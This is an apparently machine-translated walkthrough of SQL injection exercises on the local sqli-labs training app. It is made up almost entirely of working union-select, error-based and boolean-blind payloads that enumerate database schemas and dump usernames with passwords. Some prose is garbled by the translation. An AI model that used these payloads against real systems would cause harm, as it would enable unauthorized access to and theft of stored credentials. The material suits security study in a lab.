Catalog

Preface

Character injection

Digital injection

An error injection

Bull's blind note

Preface

 Injection point type classification 

     Digital ：
    select * from tabname where id = 1

     Character ：
    select * from tabname where id = '1’

     Search type ：
    select * from tabname where id like '%1%'

 Judgment type process 

     Input  1
     Suppose there are query results , But at this time, the injection point type cannot be distinguished 
     Input  1 and 1 = 1
     For digital injection points ：
    select * from tabname where id= 1 and 1 = 1, There will be query results 
     For character injection points ：
    select * from tabname where id= ‘1 and 1 = 1’, There will be no query results 
     For search injection points ：
    select * from tabname where id like ‘%1 and 1 = 1%’, There will be no query results 
     This step can detect the digital injection point .
     Input  1’ and ‘1’='1
     For character injection points ：
    select * from tabname where id= ‘1’ and ‘1’=‘1’, There will be query results 
     For search injection points ：
    select * from tabname where id like ‘%1’ and ‘1’=‘1%’, There will be no query results 
     This step can detect the character injection point .
     Exclude numeric and character types , The rest may be search injection points .

Character injection

http://127.0.0.1/sqli-labs-master/Less-1/
# Normal page 

?id=1

?id=1'
# Single quote error  1  There is a single quotation mark behind it 

?id=1"
# Double quotation marks are normal 

 The abnormal interface indicates that there is an injection point 
?id=1'--+
#  --+   Annotation symbols , Comment out the following statement 
?id=1 and 1=2
# There is no change   Description is a single quotation mark character injection 

order by  Statement to determine the number of data columns 
?id=1' order by4--+
#4 There are only three columns of error reporting instructions 

union select  Union query statement 
?id=100' union select 1,2,3--+
#1,2 It's a 、1,2,3,4 It's the three one. 、 All wrong 
 So the display bits are two .

 Blasting database 
?id=100' union select 1,2,group_concat(schema_name)from information_schema.schemata--+

 Query the database version and name 
?id=100'union select 1,version(),database()--+

 The query table name 
?id=100' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='security')--+

 Query column 
?id=100' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name ='users') --+
​

 Query the user 
?id=100'union select 1,2,group_concat(username) from security.users--+

 Query user password 
?id=100' union select 1,2,group_concat(username,0x3a,password) from users --+

Digital injection

http://127.0.0.1/sqli-labs-master/Less-2/

?id=1

?id=1'

?id=1"

?id=1 and 1=1
# Echo correct 、 Digital injection does not need to be closed , Character type needs 

?id=1 and 1=2
# Report errors 、 The judgment is digital 

?id=1 order by 4
# The description has only three columns 

?id=1 order by 3

# Query database version 
?id=100 union select 1,version(),database()
# Relative to character type   No closure required 

# The query table name 
?id=100 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='security')

# Query column 
?id=100 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name ='users')

# Query field content 
?id=100 union select 1,2,group_concat(username,0x3a,password) from users

An error injection

Single quotation marks

http://127.0.0.1/sqli-labs-master/Less-3/

?id=1

?id=1'
# There is a bracket in the error report 

?id=1') order by 4 --+

?id=1') order by 3 --+

?id=100') union select 1,version(),database()--+
# Query database version 

Double quotes

?id=100") union select 1,version(),database()--+

Bull's blind note

http://127.0.0.1/sqli-labs-master/Less-5/?id=1

?id=1'

?id=1' order by 4--+

?id=1' order by 3--+

?id=1' and left ((select database()),1)='s'--+
# function left, Test whether the first letter of the database name is s, By returning “you are in" We know it's right 

?id=1' and left((select database()),1)<'t'--+
# There is an echo indicating that it is less than t

?id=1' and left((select database()),1)>'t'--+
# No echo also means less than t
# The first character of the database is greater than t No echo ,  Try bit by bit , The final library name is security

 Confirm the table name 
?id=1' and left ((select table_name from information_schema. tables where table_schema=database() limit 0,1),6)= 'emails'--+
​
# Echo correct   explain   Yes emails This table 
​
# The other steps are the same , modify limit x,1 and left The number of digits in the limit number , The first table is emails, Blasting to the second table is referer, Finally, the fourth table exploded to user surface , be known as users.

?id=1' and left ((select table_name from information_schema. tables where table_schema=database() limit 1,1),7)= 'referer'--+

?id=1' and left ((select table_name from information_schema. tables where table_schema=database() limit 3,1),5)= 'users'--+

 Determine the column 
 Make sure the second column is users The third column is password
​
?id=1' and left((select table_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),8)='username'--+
# It's strange   Not at first   It will be fine again after a while 

?id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1),8)='password'--+

?id=1' and left((select password from users order by id limit 0,1),4)='dump'--+